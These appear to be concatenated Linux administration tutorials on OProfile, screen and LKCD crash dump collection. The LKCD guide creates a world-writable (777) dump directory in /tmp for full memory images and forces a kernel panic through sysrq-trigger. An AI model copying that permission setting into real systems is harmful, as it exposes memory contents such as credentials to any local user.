I must warn you though. Officially, OProfile is alpha software. Although it has been tested to work well with a wide range of architecture platforms and kernels, there’s no guarantee it will do what’s expected of it. You may even break your system.

My experience shows no issues with OProfile, but you may not be so lucky. Now, if you’re brave enough, proceed.

Regardless, using OProfile is a very geeky thing that will surely impress everyone and may even provide you with yet another powerful tool for making your environment smarter, faster and safer. Home users will probably never need it, but they just might be piqued enough to give it a try, especially if they’re facing severe performance problems. System admin wise, OProfile probably falls into the Level II-III support, so you won’t be using it that often, but when you do, it should come quite handy.

Install OProfile

The tool comes available in the repositories of many distributions, so you will not have to manually download and compile. If you do, consider using checkinstall to have it registered in your software database.

Install

Running OProfile

Now, we need to start using the tool.

The first question you need to ask yourselves is: do you also want to profile the kernel? Your answer will determine the OProfile command line.

If you wish to run OProfile without profiling the kernel, then:

opcontrol –no-vmlinux

If you do want to profile the kernel, as well, then:

opcontrol –vmlinux=/boot/vmlinux-`uname -r`

vmlinux

The above command will set the Linux kernel to the running version of your kernel in uncompressed form. To make sure such a kernel exists, please take a look under your /boot directory.

Modern Linux distributions ship with the kernel archived (zipped) to conserve space, so you will have to unzip it before it can be used:

Boot dir

So we do have the kernel available, it’s vmlinux-<whatever>.gz. We need to unzip it. This is done with the gunzip command:

gunzip vmlinux-<something>.gz

Like this:

Gunzip

Now, if needed, rerun the opcontrol command from before to set the kernel. Once you’ve done this, launch the tool. It will start collecting the data.

Start

Let it run for a while before stopping it and profiling the data. In fact, to make things meaningful, we’ll run a little compilation in the background, so that our report contains more data, as well as more meaningful data. A good example is the MPlayer.

Compiling

After a while you can simply dump the collected data and continue profiling or stop the profiler altogether. To just dump the data, use:

opcontrol –dump

To stop it, use:

opcontrol –stop

Stop

If, at any given moment you wish to resrt your profiling counters and start fresh, then you can reset the OProfile deamon:

opcontrol –reset

And to shut it down altogether:

opcontrol –shutdown

Reporting

Once you’ve collected enough data, time for a report. Just run:

opreport

To get what you need. This is where the real fun begins, analyzing the report and trying to understand the problems you’re facing.

Anyhow, here’s a sample of what it may look like. Screenshot taken on another host, so please don’t mind the differences in host names and CPU speeds and such.

Report

More data

In the leftmost column, you will get the exact number of samples collected. In the middle one, the percentage of time spent using different libraries. In the rightmost column, the actual process name. Usually, you will see a whole bunch of glibc, perl and other libraries. If you’re compiling a tool that also uses GUI, then other interesting bits, too.

Since I was also listening to Youtube in Firefox while compiling and doing a few more things, you will notice calls to Nvidia driver, Flash player and so forth.

Now, opreport may not report everything you want and it may even exit with an error. Sometimes, the amount of time spent profiling may not be enough to produce a meaningful report. At other times, you may need packages with debug symbols or even a complete debug kernel.

In that case, you will want to run opcontrol –symbols or opcontrol -l to get more data.

Symbols

And you may even want to create a call graph. This is done by running opcontrol -c.

Call graph

You will need a tool that can read and display call graphs. There are many, many options available. For example, an oldie but goodie Kpl comes to mind:

Kpl

You may also want to use KCachegrind, but this one requires the call graphs to be in the Valgrind format, which will require a conversion tool. This is where the real hacking kicks in, but this is beyond the scope of this article. We’ll talk about advanced system debugging in following articles. Consider strace and OProfile a sort of a long and expensive warmup.

Conclusion

OProfile is a very handy, useful tool. In the hands of a smart system administrator, it can be used to detect application slowness problems, analyze system bottlenecks, optimize system performance and utilization, and resolve resource/usage conflicts. Combined with a range of other admin programs, some of which we’ve talked about and others we are yet to see, OProfile is a must-have item on the system debugging checklist.

I hope you’ve enjoyed this article. Many more are yet to come, exposing you to the realm of uber-hack. As to profiling itself, we’ll talk about some other cool programs, including Valgrind and Linux Trace Toolkit (LTT).

Linux super-duper admin tools: screen


Time to learn about yet another cool little admin application that will change the way you think and work. We had strace, a mighty, versatile debugging tool that helped us diagnose and categorize system programs quickly and effectively and point us in the right direction in our investigation of problems. We had OProfile, a powerful profiling utility that can be used to time the system and application performance and identify chokepoints and bottlenecks in program executions. Time to step back and appraise screen.

Teaser

screen

screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells. Each virtual terminal provides the functions of the legendary DEC VT100 terminal.

Additionally, the utility has insert/delete line, support for multiple character sets, a scrollback history buffer for each virtual terminal, and a copy-and-paste mechanism that allows moving text regions between windows.

When screen is called, it creates a single window with a shell in it and then gets out of your way so that you can use the program as you normally would. Then, at any time, you can create new full-screen windows with other programs in them, including more shells, kill existing windows, view a list of windows, turn output logging on and off, copy & paste text between windows, view the scrollback history, switch between windows in whatever manner you wish, etc.

All windows run their programs completely independent of each other. Programs continue to run when their window is currently invisible and even when the whole screen session is detached from the user’s terminal. When a program terminates, screen kills the window that contained it. If this window was in the foreground, the display switches to the previous window; if none are left, screen exits.

In a nutshell, if Ctrl + F buttons allow you to switch between up to seven virtual consoles, horizontally, screen lets you create an infinite vertical stack of consoles in each one of these.

Home users running full GUI desktops and playing with tabbed terminal utilities would be hard-tempted to find merit in screen, but when you’re running in runlevel 3 and the monitor space is limited, screen is a blessing.

Screen in action

Let’s begin with a few screenshots. To start screen, just type screen in any one console windows, be it gnome-terminal, xterm, Konsole, or any other.

Launch

This will display an introduction messages. Press Enter to exit.

Started

You’re inside a new virtual console. Why not fire another?

First

And here’s the second:

Second

Using the right keyboard shortcuts, we can switch between them, back and forth. Use Ctrl + a then 0 to go to the zeroth (first) screen, Ctrl + a then 1 to go to the second one, and so forth.

First toggled

Now, demonstrating screen with still images is difficult, so here’s a Flash movie! Created using Wink, which served us well so many times, including the tutorial itself, as well as the Windows PowerShell article, and a few others.

So here we go:

Lovely, right! Damn right!

Help window

Don’t hesitate to call for help. Ctrl + a, then ? will pop the help screen.

Help

Of course, you can also read the man page for more details. There’s a plenty you can do with screen, attach/detach/reattach sessions, specify the history scrollback buffer, turn login mode on and off, suppress error messages, and more. screen is a powerful marvel and you should start using it.

Conclusion

Yet another powerful tool mastered. Our list grows bigger, and so does our knowledge. screen may seem trivial to you, but what if you need to debug problems across multiple session and you can’t afford to have tons of Konsole or xterm windows strewn about the desktop like mad. Then, there’s the issue of practical visibility. Never take your eyes off the screen and yet enjoy full multi-view console.

I hope you liked this little surprise. Now, off to new wonders. Stay tuned for many more articles of great admin tools, aptly called super-duper, by me. Be excellent to each other and party on.

Collecting And Analyzing Linux Kernel Crashes – LKCD


Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, the crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data available. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back online, LKCD is initiated. On different systems, this takes a different startup script. For instance, on a RedHat machine, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first command is lkcd config, which we will review more intimately later. This commands prepares the system for the next crash. The second command is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:

Illustration

Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.

DUMP_ACTIVE=”1″

Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that the DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Accidentally, this section partially explains why the somewhat nebulous and historic requirement for a swap partition to be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example,/dev/sdb1. Let’s use the LKCD default, which calls the DUMPDEV directive to be set to /dev/vmdump.

DUMPDEV=”/dev/vmdump”

Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump ->/dev/sda5

/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the/etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.

DUMPDIR=”/tmp/dump”

And a screenshot of the configuration file in action, just to make you feel comfortable:

Dumpdir

Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

Value
Action
DUMP_NONE (0)
Do nothing, just return if called
DUMP_HEADER (1)
Dump the dump header and first 128K bytes out
DUMP_KERN (2)
Everything in DUMP_HEADER and kernel pages only
DUMP_USED (4)
Everything except kernel free pages
DUMP_ALL (8)
All memory

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

Flag
Value
0x80000000
Local block device
0x40000000
Network device

Later, we will also use the network option. For now, we need local.

DUMP_FLAGS=”0x80000000″

Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed or use RLE or GZIP to compress them. It’s up to you.

DUMP_COMPRESS=”2″

I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.

Additional settings

There are several other directives listed in the configuration file. These other directives are all set to the the configuration defaults. You can find a brief explanation on each below. If you find the section inadequate, please email me and I’ll elaborate.

These include:

  • DUMP_SAVE=”1″ – Save the memory image to disk
  • PANIC_TIMEOUT=”5″ – The timeout (in seconds) before a reboot after panic occurs
  • BOUNDS_LIMIT =”10″ – A limit on the number of dumps kept
  • KEXEC_IMAGE=”/boot/vmlinuz” – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE=”root console=tty0″ – Defines what parameters the kernel should use when booting after the crash; usually, you won’t have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step we need to do is enable the core dump capturing. In other words, we need to sort of source the configuration file so the LKCD utility can use the values set in it. This is done by running the lkcd configcommand, followed by lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, the LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …

Note:

Disk-based dumping may not always succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like the md RAID devices, presenting another problem into the equation. Therefore, to overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider using the network dumping option. Therefore, before we demonstrate the LKCD functionality, we’ll study the netdump option first.

LKCD netdump procedure

Netdump procedure is different from the local dump in having two machines involved in the process. One is the host itself that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port to incoming network traffic, particular to the LKCD netdump. When crashes are sent, they will be saved to the local block device on the server. Other terms used to describe the relationship between the netdump server and the client is that of source and target, if you will: the client is a source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.

DUMP_FLAGS=”0x40000000″

Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.

SOURCE_PORT=”6688″

Make sure dump directory is writable for the netdump user

This directive is extremely important. It defines the ability of the netdump service to write to the partitions / directories on the server. The netdump server run as the netdump user. We need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status

Likewise:

netstat -tulpen | grep 6688
udp 0 0 0.0.0.0:6688 0.0.0.0:* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

Client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When kernel crashes for whatever reason on this machine, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we have configured our clients to dump their core to the /dev/vmdump device. However, network dump requires an active network interface. There are other considerations in place as well, but we will review them later.

DUMP_DEV=”eth0″

Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it’s the server machine we configured above. To configure this directive – and the one after – we need to go back to our server and collect some information, the output from the ifconfig command, listing the IP address and the MAC address. For example:

inet addr:192.168.1.3
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:

TARGET_HOST=”192.168.1.3″

Alternatively, it is also possible to use hostnames, but this requires the use of hosts file, DNS, NIS or other name resolution mechanisms properly set and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:

ETH_ADDRESS=”00:12:1b:40:c7:63

Limitation:

Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means /24 subnet. We’ll see an example for this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.

TARGET_PORT=”6688″

Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.

SOURCE_PORT=”6688″

And image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd querycommands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:

Success

This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to create panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been set:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.

Worked

Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:

Failure

Conclusion

LKCD is a very useful application, although it has its limitations.

On one hand, it provides with the critical ability to perform indepth forensics on crashed systems post-mortem. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on the internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large RAM, when dumping the entire contents of the memory to local partitions might be problematic. Furthermore, the netdump functionality allows LKCD to be used on hosts configured with RAID, since LKCD is unable to work with md partitions, overcoming the problem.

However, the limitation to use within the same network segment severely limits the ability to mass-deploy the netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers can be used without relying on specific network topography.

Lastly, LKCD is a somewhat old utility and might not work well on the modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article